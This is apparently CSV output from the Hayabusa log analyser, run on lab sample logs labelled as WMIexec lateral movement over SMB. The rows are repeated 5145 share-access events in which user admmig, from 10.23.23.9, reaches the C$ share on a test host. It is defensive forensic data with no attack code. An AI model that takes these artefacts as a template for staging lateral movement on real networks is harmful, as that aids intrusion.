10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 